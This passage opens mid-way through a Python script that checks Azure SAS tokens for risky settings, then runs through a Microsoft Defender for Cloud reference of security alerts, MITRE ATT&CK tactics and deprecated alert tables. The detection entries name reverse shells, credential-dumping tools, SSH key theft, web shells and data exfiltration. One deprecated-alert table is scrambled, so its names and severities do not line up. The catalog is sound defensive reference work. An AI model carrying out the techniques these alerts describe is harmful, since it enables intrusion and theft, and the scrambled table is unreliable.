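        review.findings.append("list permission allows enumeration of containers and blobs")
    if expiry is None:
        review.findings.append("no expiry ('se') on token")
    elif expiry - now > MAX_LIFETIME:
        review.findings.append(f"expiry {expiry:%Y-%m-%d} is more than {MAX_LIFETIME.days} days away")
    if "sip" not in params:
        review.findings.append("no source IP restriction ('sip')")
    if not is_private_ip(caller_ip):
        review.findings.append(f"used from public IP {caller_ip}")
    return review


if __name__ == "__main__":
    for label, token, ip in (("leaked", LEAKED_SAS, "203.0.113.5"), ("scoped", SCOPED_SAS, "10.0.0.4")):
        result = review_sas(token, ip)
        print(f"{label}: {len(result.findings)} finding(s)")
        for finding in result.findings:
            print("  -", finding)
```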


Alert (alert type): Unusual SAS token was used to access an Azure storage account from a public IP address (Preview) (Storage.Blob_AccountSas.UnusualExternalAccess)
Description: The alert indicates that someone with an external (public) IP address has accessed the storage account using an account SAS token. The access is highly unusual and considered suspicious, as access to the storage account using SAS tokens typically comes only from internal (private) IP addresses.

It's possible that a SAS token was leaked or generated by a malicious actor either from within your organization or externally to gain access to this storage account.

Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan.
MITRE tactics: Exfiltration / Resource Development / Impact
Severity: Low

Alert (alert type): Malicious file uploaded to storage account (Preview) (Storage.Blob_AM.MalwareFound)
Description: The alert indicates that a malicious blob was uploaded to a storage account. This security alert is generated by the Malware Scanning feature in Defender for Storage. Potential causes may include an intentional upload of malware by a threat actor or an unintentional upload of a malicious file by a legitimate user.

Applies to: Azure Blob (Standard general-purpose v2, Azure Data Lake Storage Gen2 or premium block blobs) storage accounts with the new Defender for Storage plan with the Malware Scanning feature enabled.
MITRE tactics: LateralMovement
Severity: High

Further details and notes


Alerts for Azure Cosmos DB


Alert (alert type): Access from a Tor exit node (CosmosDB_TorAnomaly)
Description: This Azure Cosmos DB account was successfully accessed from an IP address known to be an active exit node of Tor, an anonymizing proxy. Authenticated access from a Tor exit node is a likely indication that a threat actor is trying to hide their identity.
MITRE tactics: Initial Access
Severity: High/Medium

Alert (alert type): Access from a suspicious IP (CosmosDB_SuspiciousIp)
Description: This Azure Cosmos DB account was successfully accessed from an IP address that was identified as a threat by Microsoft Threat Intelligence.
MITRE tactics: Initial Access
Severity: Medium

Alert (alert type): Access from an unusual location (CosmosDB_GeoAnomaly)
Description: This Azure Cosmos DB account was accessed from a location considered unfamiliar, based on the usual access pattern.

Either a threat actor has gained access to the account, or a legitimate user has connected from a new or unusual geographic location.
MITRE tactics: Initial Access
Severity: Low

Alert (alert type): Unusual volume of data extracted (CosmosDB_DataExfiltrationAnomaly)
Description: An unusually large volume of data has been extracted from this Azure Cosmos DB account. This might indicate that a threat actor exfiltrated data.
MITRE tactics: Exfiltration
Severity: Medium

Alert (alert type): Extraction of Azure Cosmos DB accounts keys via a potentially malicious script (CosmosDB_SuspiciousListKeys.MaliciousScript)
Description: A PowerShell script was run in your subscription and performed a suspicious pattern of key-listing operations to get the keys of Azure Cosmos DB accounts in your subscription. Threat actors use automated scripts, like Microburst, to list keys and find Azure Cosmos DB accounts they can access.

This operation might indicate that an identity in your organization was breached, and that the threat actor is trying to compromise Azure Cosmos DB accounts in your environment for malicious intentions.

Alternatively, a malicious insider could be trying to access sensitive data and perform lateral movement.
MITRE tactics: Collection
Severity: High

Alert (alert type): Suspicious extraction of Azure Cosmos DB account keys (AzureCosmosDB_SuspiciousListKeys.SuspiciousPrincipal)
Description: A suspicious source extracted Azure Cosmos DB account access keys from your subscription. If this source is not a legitimate source, this may be a high impact issue. The access key that was extracted provides full control over the associated databases and the data stored within. See the details of each specific alert to understand why the source was flagged as suspicious.
MITRE tactics: Credential Access
Severity: High

Alert (alert type): SQL injection: potential data exfiltration (CosmosDB_SqlInjection.DataExfiltration)
Description: A suspicious SQL statement was used to query a container in this Azure Cosmos DB account.

The injected statement might have succeeded in exfiltrating data that the threat actor isn't authorized to access.

Due to the structure and capabilities of Azure Cosmos DB queries, many known SQL injection attacks on Azure Cosmos DB accounts can't work. However, the variation used in this attack may work and threat actors can exfiltrate data.
MITRE tactics: Exfiltration
Severity: Medium

Alert (alert type): SQL injection: fuzzing attempt (CosmosDB_SqlInjection.FailedFuzzingAttempt)
Description: A suspicious SQL statement was used to query a container in this Azure Cosmos DB account.

Like other well-known SQL injection attacks, this attack won't succeed in compromising the Azure Cosmos DB account.

Nevertheless, it's an indication that a threat actor is trying to attack the resources in this account, and your application may be compromised.

Some SQL injection attacks can succeed and be used to exfiltrate data. This means that if the attacker continues performing SQL injection attempts, they may be able to compromise your Azure Cosmos DB account and exfiltrate data.

You can prevent this threat by using parameterized queries.
MITRE tactics: Pre-attack
Severity: Low

Further details and notes


Alerts for Azure network layer


Alert (alert type): Network communication with a malicious machine detected (Network_CommunicationWithC2)
Description: Network traffic analysis indicates that your machine (IP %{Victim IP}) has communicated with what is possibly a Command and Control center. When the compromised resource is a load balancer or an application gateway, the suspected activity might indicate that one or more of the resources in the backend pool (of the load balancer or application gateway) has communicated with what is possibly a Command and Control center.
MITRE tactics: Command and Control
Severity: Medium


Alert (alert type): Possible compromised machine detected (Network_ResourceIpIndicatedAsMalicious)
Description: Threat intelligence indicates that your machine (at IP %{Machine IP}) may have been compromised by a malware of type Conficker. Conficker was a computer worm that targets the Microsoft Windows operating system and was first detected in November 2008. Conficker infected millions of computers including government, business and home computers in over 200 countries/regions, making it the largest known computer worm infection since the 2003 Welchia worm.
MITRE tactics: Command and Control
Severity: Medium

Alert (alert type): Possible incoming %{Service Name} brute force attempts detected (Generic_Incoming_BF_OneToOne)
Description: Network traffic analysis detected incoming %{Service Name} communication to %{Victim IP}, associated with your resource %{Compromised Host} from %{Attacker IP}. When the compromised resource is a load balancer or an application gateway, the suspected incoming traffic has been forwarded to one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows suspicious activity between %{Start Time} and %{End Time} on port %{Victim Port}. This activity is consistent with brute force attempts against %{Service Name} servers.
MITRE tactics: PreAttack
Severity: Medium

Alert (alert type): Possible incoming SQL brute force attempts detected (SQL_Incoming_BF_OneToOne)
Description: Network traffic analysis detected incoming SQL communication to %{Victim IP}, associated with your resource %{Compromised Host}, from %{Attacker IP}. When the compromised resource is a load balancer or an application gateway, the suspected incoming traffic has been forwarded to one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows suspicious activity between %{Start Time} and %{End Time} on port %{Port Number} (%{SQL Service Type}). This activity is consistent with brute force attempts against SQL servers.
MITRE tactics: PreAttack
Severity: Medium

Alert (alert type): Possible outgoing denial-of-service attack detected (DDOS)
Description: Network traffic analysis detected anomalous outgoing activity originating from %{Compromised Host}, a resource in your deployment. This activity may indicate that your resource was compromised and is now engaged in denial-of-service attacks against external endpoints. When the compromised resource is a load balancer or an application gateway, the suspected activity might indicate that one or more of the resources in the backend pool (of the load balancer or application gateway) was compromised. Based on the volume of connections, we believe that the following IPs are possibly the targets of the DOS attack: %{Possible Victims}. Note that it is possible that the communication to some of these IPs is legitimate.
MITRE tactics: Impact
Severity: Medium

Alert (alert type): Suspicious incoming RDP network activity from multiple sources (RDP_Incoming_BF_ManyToOne)
Description: Network traffic analysis detected anomalous incoming Remote Desktop Protocol (RDP) communication to %{Victim IP}, associated with your resource %{Compromised Host}, from multiple sources. When the compromised resource is a load balancer or an application gateway, the suspected incoming traffic has been forwarded to one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows %{Number of Attacking IPs} unique IPs connecting to your resource, which is considered abnormal for this environment. This activity may indicate an attempt to brute force your RDP endpoint from multiple hosts (botnet).
MITRE tactics: PreAttack
Severity: Medium


Alert (alert type): Suspicious incoming RDP network activity (RDP_Incoming_BF_OneToOne)
Description: Network traffic analysis detected anomalous incoming Remote Desktop Protocol (RDP) communication to %{Victim IP}, associated with your resource %{Compromised Host}, from %{Attacker IP}. When the compromised resource is a load balancer or an application gateway, the suspected incoming traffic has been forwarded to one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows %{Number of Connections} incoming connections to your resource, which is considered abnormal for this environment. This activity may indicate an attempt to brute force your RDP endpoint.
MITRE tactics: PreAttack
Severity: Medium

Alert (alert type): Suspicious incoming SSH network activity from multiple sources (SSH_Incoming_BF_ManyToOne)
Description: Network traffic analysis detected anomalous incoming SSH communication to %{Victim IP}, associated with your resource %{Compromised Host}, from multiple sources. When the compromised resource is a load balancer or an application gateway, the suspected incoming traffic has been forwarded to one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows %{Number of Attacking IPs} unique IPs connecting to your resource, which is considered abnormal for this environment. This activity may indicate an attempt to brute force your SSH endpoint from multiple hosts (botnet).
MITRE tactics: PreAttack
Severity: Medium

Alert (alert type): Suspicious incoming SSH network activity (SSH_Incoming_BF_OneToOne)
Description: Network traffic analysis detected anomalous incoming SSH communication to %{Victim IP}, associated with your resource %{Compromised Host}, from %{Attacker IP}. When the compromised resource is a load balancer or an application gateway, the suspected incoming traffic has been forwarded to one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows %{Number of Connections} incoming connections to your resource, which is considered abnormal for this environment. This activity may indicate an attempt to brute force your SSH endpoint.
MITRE tactics: PreAttack
Severity: Medium

Alert (alert type): Suspicious outgoing %{Attacked Protocol} traffic detected (PortScanning)
Description: Network traffic analysis detected suspicious outgoing traffic from %{Compromised Host} to destination port %{Most Common Port}. When the compromised resource is a load balancer or an application gateway, the suspected outgoing traffic originated from one or more of the resources in the backend pool (of the load balancer or application gateway). This behavior may indicate that your resource is taking part in %{Attacked Protocol} brute force attempts or port sweeping attacks.
MITRE tactics: Discovery
Severity: Medium

Alert (alert type): Suspicious outgoing RDP network activity to multiple destinations (RDP_Outgoing_BF_OneToMany)
Description: Network traffic analysis detected anomalous outgoing Remote Desktop Protocol (RDP) communication to multiple destinations originating from %{Compromised Host} (%{Attacker IP}), a resource in your deployment. When the compromised resource is a load balancer or an application gateway, the suspected outgoing traffic originated from one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows your machine connecting to %{Number of Attacked IPs} unique IPs, which is considered abnormal for this environment. This activity may indicate that your resource was compromised and is now used to brute force external RDP endpoints. Note that this type of activity could possibly cause your IP to be flagged as malicious by external entities.
MITRE tactics: Discovery
Severity: High


Alert (alert type): Suspicious outgoing RDP network activity (RDP_Outgoing_BF_OneToOne)
Description: Network traffic analysis detected anomalous outgoing Remote Desktop Protocol (RDP) communication to %{Victim IP} originating from %{Compromised Host} (%{Attacker IP}), a resource in your deployment. When the compromised resource is a load balancer or an application gateway, the suspected outgoing traffic originated from one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows %{Number of Connections} outgoing connections from your resource, which is considered abnormal for this environment. This activity may indicate that your machine was compromised and is now used to brute force external RDP endpoints. Note that this type of activity could possibly cause your IP to be flagged as malicious by external entities.
MITRE tactics: Lateral Movement
Severity: High

Alert (alert type): Suspicious outgoing SSH network activity to multiple destinations (SSH_Outgoing_BF_OneToMany)
Description: Network traffic analysis detected anomalous outgoing SSH communication to multiple destinations originating from %{Compromised Host} (%{Attacker IP}), a resource in your deployment. When the compromised resource is a load balancer or an application gateway, the suspected outgoing traffic originated from one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows your resource connecting to %{Number of Attacked IPs} unique IPs, which is considered abnormal for this environment. This activity may indicate that your resource was compromised and is now used to brute force external SSH endpoints. Note that this type of activity could possibly cause your IP to be flagged as malicious by external entities.
MITRE tactics: Discovery
Severity: Medium

Alert (alert type): Suspicious outgoing SSH network activity (SSH_Outgoing_BF_OneToOne)
Description: Network traffic analysis detected anomalous outgoing SSH communication to %{Victim IP} originating from %{Compromised Host} (%{Attacker IP}), a resource in your deployment. When the compromised resource is a load balancer or an application gateway, the suspected outgoing traffic originated from one or more of the resources in the backend pool (of the load balancer or application gateway). Specifically, sampled network data shows %{Number of Connections} outgoing connections from your resource, which is considered abnormal for this environment. This activity may indicate that your resource was compromised and is now used to brute force external SSH endpoints. Note that this type of activity could possibly cause your IP to be flagged as malicious by external entities.
MITRE tactics: Lateral Movement
Severity: Medium

Alert (alert type): Traffic detected from IP addresses recommended for blocking
Description: Microsoft Defender for Cloud detected inbound traffic from IP addresses that are recommended to be blocked. This typically occurs when this IP address doesn't communicate regularly with this resource. Alternatively, the IP address has been flagged as malicious by Defender for Cloud's threat intelligence sources.
MITRE tactics: Probing
Severity: Low

Further details and notes


Alerts for Azure Key Vault


Alert (alert type): Access from a suspicious IP address to a key vault (KV_SuspiciousIPAccess)
Description: A key vault has been successfully accessed by an IP that has been identified by Microsoft Threat Intelligence as a suspicious IP address. This may indicate that your infrastructure has been compromised. We recommend further investigation. Learn more about Microsoft's threat intelligence capabilities.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Access from a TOR exit node to a key vault (KV_TORAccess)
Description: A key vault has been accessed from a known TOR exit node. This could be an indication that a threat actor has accessed the key vault and is using the TOR network to hide their source location. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): High volume of operations in a key vault (KV_OperationVolumeAnomaly)
Description: An anomalous number of key vault operations were performed by a user, service principal, and/or a specific key vault. This anomalous activity pattern may be legitimate, but it could be an indication that a threat actor has gained access to the key vault and the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Suspicious policy change and secret query in a key vault (KV_PutGetAnomaly)
Description: A user or service principal has performed an anomalous Vault Put policy change operation followed by one or more Secret Get operations. This pattern is not normally performed by the specified user or service principal. This may be legitimate activity, but it could be an indication that a threat actor has updated the key vault policy to access previously inaccessible secrets. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Suspicious secret listing and query in a key vault (KV_ListGetAnomaly)
Description: A user or service principal has performed an anomalous Secret List operation followed by one or more Secret Get operations. This pattern is not normally performed by the specified user or service principal and is typically associated with secret dumping. This may be legitimate activity, but it could be an indication that a threat actor has gained access to the key vault and is trying to discover secrets that can be used to move laterally through your network and/or gain access to sensitive resources. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Unusual access denied - User accessing high volume of key vaults denied (KV_AccountVolumeAccessDeniedAnomaly)
Description: A user or service principal has attempted access to an anomalously high volume of key vaults in the last 24 hours. This anomalous access pattern may be legitimate activity. Though this attempt was unsuccessful, it could be an indication of a possible attempt to gain access to the key vaults and the secrets contained within them. We recommend further investigations.
MITRE tactics: Discovery
Severity: Low

Alert (alert type): Unusual access denied - Unusual user accessing key vault denied (KV_UserAccessDeniedAnomaly)
Description: A key vault access was attempted by a user that does not normally access it. This anomalous access pattern may be legitimate activity. Though this attempt was unsuccessful, it could be an indication of a possible attempt to gain access to the key vault and the secrets contained within it.
MITRE tactics: Initial Access, Discovery
Severity: Low

Alert (alert type): Unusual application accessed a key vault (KV_AppAnomaly)
Description: A key vault has been accessed by a service principal that doesn't normally access it. This anomalous access pattern may be legitimate activity, but it could be an indication that a threat actor has gained access to the key vault in an attempt to access the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium


Alert (alert type): Unusual operation pattern in a key vault (KV_OperationPatternAnomaly)
Description: An anomalous pattern of key vault operations was performed by a user, service principal, and/or a specific key vault. This anomalous activity pattern may be legitimate, but it could be an indication that a threat actor has gained access to the key vault and the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Unusual user accessed a key vault (KV_UserAnomaly)
Description: A key vault has been accessed by a user that does not normally access it. This anomalous access pattern may be legitimate activity, but it could be an indication that a threat actor has gained access to the key vault in an attempt to access the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Unusual user-application pair accessed a key vault (KV_UserAppAnomaly)
Description: A key vault has been accessed by a user-service principal pair that doesn't normally access it. This anomalous access pattern may be legitimate activity, but it could be an indication that a threat actor has gained access to the key vault in an attempt to access the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): User accessed high volume of key vaults (KV_AccountVolumeAnomaly)
Description: A user or service principal has accessed an anomalously high volume of key vaults. This anomalous access pattern may be legitimate activity, but it could be an indication that a threat actor has gained access to multiple key vaults in an attempt to access the secrets contained within them. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Alert (alert type): Denied access from a suspicious IP to a key vault (KV_SuspiciousIPAccessDenied)
Description: An unsuccessful key vault access has been attempted by an IP that has been identified by Microsoft Threat Intelligence as a suspicious IP address. Though this attempt was unsuccessful, it indicates that your infrastructure might have been compromised. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Low

Alert (alert type): Unusual access to the key vault from a suspicious IP (Non-Microsoft or External) (KV_UnusualAccessSuspiciousIP)
Description: A user or service principal has attempted anomalous access to key vaults from a non-Microsoft IP in the last 24 hours. This anomalous access pattern may be legitimate activity. It could be an indication of a possible attempt to gain access to the key vault and the secrets contained within it. We recommend further investigations.
MITRE tactics: Credential Access
Severity: Medium

Further details and notes


Alerts for Azure DDoS Protection


Alert (alert type): DDoS Attack detected for Public IP (NETWORK_DDOS_DETECTED)
Description: DDoS Attack detected for Public IP (IP address) and being mitigated.
MITRE tactics: Probing
Severity: High

Alert (alert type): DDoS Attack mitigated for Public IP (NETWORK_DDOS_MITIGATED)
Description: DDoS Attack mitigated for Public IP (IP address).
MITRE tactics: Probing
Severity: Low


MITRE ATT&CK tactics


Understanding the intention of an attack can help you investigate and report the event more easily. To help with these efforts, Microsoft Defender for Cloud alerts include the MITRE tactics with many alerts.

The series of steps that describe the progression of a cyberattack from reconnaissance to data exfiltration is often referred to as a "kill chain".

Defender for Cloud's supported kill chain intents are based on version 9 of the MITRE ATT&CK matrix and are described in the table below.


Tactic: PreAttack (ATT&CK version: V7, V9)
Description: PreAttack could be either an attempt to access a certain resource regardless of a malicious intent, or a failed attempt to gain access to a target system to gather information prior to exploitation. This step is usually detected as an attempt, originating from outside the network, to scan the target system and identify an entry point.

Tactic: Initial Access (ATT&CK version: V7, V9)
Description: Initial Access is the stage where an attacker manages to get a foothold on the attacked resource. This stage is relevant for compute hosts and resources such as user accounts, certificates etc. Threat actors will often be able to control the resource after this stage.

Tactic: Persistence (ATT&CK version: V7, V9)
Description: Persistence is any access, action, or configuration change to a system that gives a threat actor a persistent presence on that system. Threat actors will often need to maintain access to systems through interruptions such as system restarts, loss of credentials, or other failures that would require a remote access tool to restart or provide an alternate backdoor for them to regain access.

Tactic: Privilege Escalation (ATT&CK version: V7, V9)
Description: Privilege escalation is the result of actions that allow an adversary to obtain a higher level of permissions on a system or network. Certain tools or actions require a higher level of privilege to work and are likely necessary at many points throughout an operation. User accounts with permissions to access specific systems or perform specific functions necessary for adversaries to achieve their objective may also be considered an escalation of privilege.

Tactic: Defense Evasion (ATT&CK version: V7, V9)
Description: Defense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as (or variations of) techniques in other categories that have the added benefit of subverting a particular defense or mitigation.

Tactic: Credential Access (ATT&CK version: V7, V9)
Description: Credential access represents techniques resulting in access to or control over system, domain, or service credentials that are used within an enterprise environment. Adversaries will likely attempt to obtain legitimate credentials from users or administrator accounts (local system administrator or domain users with administrator access) to use within the network. With sufficient access within a network, an adversary can create accounts for later use within the environment.

Tactic: Discovery (ATT&CK version: V7, V9)
Description: Discovery consists of techniques that allow the adversary to gain knowledge about the system and internal network. When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion. The operating system provides many native tools that aid in this post-compromise information-gathering phase.

Tactic: LateralMovement (ATT&CK version: V7, V9)
Description: Lateral movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems. The lateral movement techniques could allow an adversary to gather information from a system without needing more tools, such as a remote access tool. An adversary can use lateral movement for many purposes, including remote execution of tools, pivoting to more systems, access to specific information or files, access to more credentials, or to cause an effect.

Tactic: Execution (ATT&CK version: V7, V9)
Description: The execution tactic represents techniques that result in execution of adversary-controlled code on a local or remote system. This tactic is often used in conjunction with lateral movement to expand access to remote systems on a network.

Tactic: Collection (ATT&CK version: V7, V9)
Description: Collection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

Tactic: Command and Control (ATT&CK version: V7, V9)
Description: The command and control tactic represents how adversaries communicate with systems under their control within a target network.

Tactic: Exfiltration (ATT&CK version: V7, V9)
Description: Exfiltration refers to techniques and attributes that result or aid in the adversary removing files and information from a target network. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.

Tactic: Impact (ATT&CK version: V7, V9)
Description: Impact events primarily try to directly reduce the availability or integrity of a system, service, or network, including manipulation of data to impact a business or operational process. This would often refer to techniques such as ransomware, defacement, data manipulation, and others.


Note

For alerts that are in preview: The Azure Preview Supplemental Terms include additional legal terms that apply to Azure features that are in beta, preview, or otherwise not yet released into general availability.


Deprecated Defender for Servers alerts 


The following tables list the Defender for Servers security alerts that were deprecated in April 2023 as part of an improvement process.


Deprecated Linux alerts 


Alert Type                              Alert Display Name                                          Severity
VM_AbnormalDaemonTermination            Abnormal Termination                                        Low
VM_BinaryGeneratedFromCommandLine       Suspicious binary detected                                  Medium
VM_CommandlineSuspectDomain             Suspicious domain name reference                            Low
VM_CommonBot                            Behavior similar to common Linux bots detected              Medium
VM_CompCommonBots                       Commands similar to common Linux bots detected              Medium
VM_CompSuspiciousScript                 Shell Script Detected                                       Medium
VM_CompTestRule                         Composite Analytic Test Alert                               Low
VM_CronJobAccess                        Manipulation of scheduled tasks detected                    Informational
VM_CryptoCoinMinerArtifacts             Process associated with digital currency mining detected    Medium
VM_CryptoCoinMinerDownload              Possible Cryptocoinminer download detected                  Medium
VM_CryptoCoinMinerExecution             Potential crypto coin miner started                         Medium
VM_DataEgressArtifacts                  Possible data exfiltration detected                         Medium
VM_DigitalCurrencyMining                Digital currency mining related behavior detected           High
VM_DownloadAndRunCombo                  Suspicious Download Then Run Activity                       Medium
VM_EICAR                                Microsoft Defender for Cloud test alert (not a threat)      High
VM_ExecuteHiddenFile                    Execution of hidden file                                    Informational
VM_ExploitAttempt                       Possible command line exploitation attempt                  Medium
VM_ExposedDocker                        Exposed Docker daemon on TCP socket                         Medium
VM_FairwareMalware                      Behavior similar to Fairware ransomware detected            Medium
VM_FirewallDisabled                     Manipulation of host firewall detected                      Medium


Alert Type 

VM_HadoopYarnExploit 
VM_HistoryFileCleared 
VM_KnownLinuxAttackTool 
VM_KnownLinuxCredentialAccessTool 
VM_KnownLinuxDDoSToolkit 
VM_KnownLinuxScreenshotTool 
VM_LinuxBackdoorArtifact 
VM_LinuxReconnaissance 
VM_MismatchedScriptFeatures 


VM_MitreCalderaTools 


VM_NewSingleUserModeStartupScript 


VM_NewSudoerAccount 
VM_OverridingCommonFiles 
VM_PrivilegedContainerArtifacts 
VM_PrivilegedExecutionInContainer 
VM_ReadingHistoryFile 
VM_ReverseShell 
VM_SshKeyAccess 
VM_SshKeyAddition 
VM_SuspectCompilation 
VM_SuspectConnection 
VM_SuspectDownload 
VM_SuspectDownloadaArtifacts 
VM_SuspectExecutablePath 
VM_SuspectHtaccessFileAccess 
VM_SuspectlnitialShellCommand 


VM_SuspectMixedCaseText 


VM_SuspectNetworkConnection 
VM_SuspectNohup 
VM_SuspectPasswordChange 
VM_SuspectPasswordFileAccess 
VM_SuspectPhp 


VM_SuspectPortForwarding 


VM_SuspectProcessAccountPrivilegeCombo 


Alert Display Name 

Possible exploitation of Hadoop Yarn 

A history file has been cleared 

Possible attack tool detected 

Possible credential access tool detected 
Indicators associated with DDOS toolkit detected 
Screenshot taken on host 

Possible backdoor detected 

Local host reconnaissance detected 

Script extension mismatch detected 

MITRE Caldera agent detected 

Detected Persistence Attempt 

Account added to sudo group 

Potential overriding of common files 

Container running in privileged mode 

Command within a container running with high privileges 
Unusual access to bash history file 


Potential reverse shell detected 


Process seen accessing the SSH authorized keys file in an unusual way 


New SSH key added 

Suspicious compilation detected 

An uncommon connection attempt detected 

Detected file download from a known malicious source 
Detected suspicious file download 

Executable found running from a suspicious location 
Access of htaccess file detected 

Suspicious first command in shell 


Detected anomalous mix of uppercase and lowercase characters in 
command line 


Suspicious network connection 

Detected suspicious use of the nohup command 
Possible password change using crypt-method detected 
Suspicious password access 

Suspicious PHP execution detected 

Potential port forwarding to external IP address 


Process running in a service account became root unexpectedly 


Severity 
Medium 
Medium 
Medium 


Medium 


Medium 


Low 


Medium 


Medium 


Medium 


Medium 


Medium 


Low 


Medium 


Low 


Low 


Informational 


Medium 


Low 


Low 


Medium 


Medium 


Medium 


Low 


Medium 


Medium 


Low 


Medium 


Informational 


Medium 


Medium 


Informational 


Medium 


Medium 


Medium 


| Alert Type | Alert Display Name | Severity |
|---|---|---|
| VM_SuspectProcessTermination | Security-related process termination detected | Low |
| VM_SuspectUserAddition | Detected suspicious use of the useradd command | Medium |
| VM_SuspiciousCommandLineExecution | Suspicious command execution | High |
| VM_SuspiciousDNSOverHttps | Suspicious use of DNS over HTTPS | Medium |
| VM_SystemLogRemoval | Possible Log Tampering Activity Detected | Medium |
| VM_ThreatIntelCommandLineSuspectDomain | A possible connection to malicious location has been detected | Medium |
| VM_ThreatIntelSuspectLogon | A logon from a malicious IP has been detected | High |
| VM_TimerServiceDisabled | Attempt to stop apt-daily-upgrade.timer service detected | Informational |
| VM_TimestampTampering | Suspicious file timestamp modification | Low |
| VM_Webshell | Possible malicious web shell detected | Medium |


Deprecated Windows alerts


| Alert Type | Alert Display Name | Severity |
|---|---|---|
| SCUBA_MULTIPLEACCOUNTCREATE | Suspicious creation of accounts on multiple hosts | Medium |
| SCUBA_PSINSIGHT_CONTEXT | Suspicious use of PowerShell detected | Informational |
| SCUBA_RULE_AddGuestToAdministrators | Addition of Guest account to Local Administrators group | Medium |
| SCUBA_RULE_Apache_Tomcat_executing_suspicious_commands | Apache_Tomcat_executing_suspicious_commands | Medium |
| SCUBA_RULE_KnownBruteForcingTools | Suspicious process executed | High |
| SCUBA_RULE_KnownCollectionTools | Suspicious process executed | High |
| SCUBA_RULE_KnownDefenseEvasionTools | Suspicious process executed | High |
| SCUBA_RULE_KnownExecutionTools | Suspicious process executed | High |
| SCUBA_RULE_KnownPassTheHashTools | Suspicious process executed | High |
| SCUBA_RULE_KnownSpammingTools | Suspicious process executed | Medium |
| SCUBA_RULE_Lowering_Security_Settings | Detected the disabling of critical services | Medium |
| SCUBA_RULE_OtherKnownHackerTools | Suspicious process executed | High |
| SCUBA_RULE_RDP_session_hijacking_via_tscon | Suspect integrity level indicative of RDP hijacking | Medium |
| SCUBA_RULE_RDP_session_hijacking_via_tscon_service | Suspect service installation | Medium |
| SCUBA_RULE_Suppress_pesky_unauthorized_use_prohibited_notices | Detected suppression of legal notice displayed to users at logon | Low |
| SCUBA_RULE_WDigest_Enabling | Detected enabling of the WDigest UseLogonCredential registry key | Medium |
| VM.Windows_ApplockerBypass | Potential attempt to bypass AppLocker detected | High |
| VM.Windows_BariumKnownSuspiciousProcessExecution | Detected suspicious file creation | High |
| VM.Windows_Base64EncodedExecutableInCommandLineParams | Detected encoded executable in command line data | High |


| Alert Type | Alert Display Name | Severity |
|---|---|---|
| VM.Windows_CalcsCommandLineUse | Detected suspicious use of Cacls to lower the security state of the system | Medium |
| VM.Windows_CommandLineStartingAllExe | Detected suspicious command line used to start all executables in a directory | Medium |
| VM.Windows_DisablingAndDeletingIISLogFiles | Detected actions indicative of disabling and deleting IIS log files | Medium |
| VM.Windows_DownloadUsingCertutil | Suspicious download using Certutil detected | Medium |
| VM.Windows_EchoOverPipeOnLocalhost | Detected suspicious named pipe communications | High |
| VM.Windows_EchoToConstructPowerShellScript | Dynamic PowerShell script construction | Medium |
| VM.Windows_ExecutableDecodedUsingCertutil | Detected decoding of an executable using built-in certutil.exe tool | Medium |
| VM.Windows_FileDeletionIsSospisiousLocation | Suspicious file deletion detected | Medium |
| VM.Windows_KerberosGoldenTicketAttack | Suspected Kerberos Golden Ticket attack parameters observed | Medium |
| VM.Windows_KeygenToolKnownProcessName | Detected possible execution of keygen executable Suspicious process executed | Medium |
| VM.Windows_KnownCredentialAccessTools | Suspicious process executed | High |
| VM.Windows_KnownSuspiciousPowerShellScript | Suspicious use of PowerShell detected | High |
| VM.Windows_KnownSuspiciousSoftwareInstallation | High risk software detected | Medium |
| VM.Windows_MsHtaAndPowerShellCombination | Detected suspicious combination of HTA and PowerShell | Medium |
| VM.Windows_MultipleAccountsQuery | Multiple Domain Accounts Queried | Medium |
| VM.Windows_NewAccountCreation | Account creation detected | Informational |
| VM.Windows_ObfuscatedCommandLine | Detected obfuscated command line. | High |
| VM.Windows_PcaluaUseToLaunchExecutable | Detected suspicious use of Pcalua.exe to launch executable code | Medium |
| VM.Windows_PetyaRansomware | Detected Petya ransomware indicators | High |
| VM.Windows_PowerShellPowerSploitScriptExecution | Suspicious PowerShell cmdlets executed | Medium |
| VM.Windows_RansomwareIndication | Ransomware indicators detected | High |
| VM.Windows_SqlDumperUsedSuspiciously | Possible credential dumping detected [seen multiple times] | Medium |
| VM.Windows_StopCriticalServices | Detected the disabling of critical services | Medium |
| VM.Windows_SubvertingAccessibilityBinary | Sticky keys attack detected Suspicious account creation detected | Medium |
| VM.Windows_SuspiciousAccountCreation | Suspicious Account Creation Detected | Medium |
| VM.Windows_SuspiciousFirewallRuleAdded | Detected suspicious new firewall rule | Medium |
| VM.Windows_SuspiciousFTPSSwitchUsage | Detected suspicious use of FTP -s switch | Medium |
| VM.Windows_SuspiciousSQLActivity | Suspicious SQL activity | Medium |
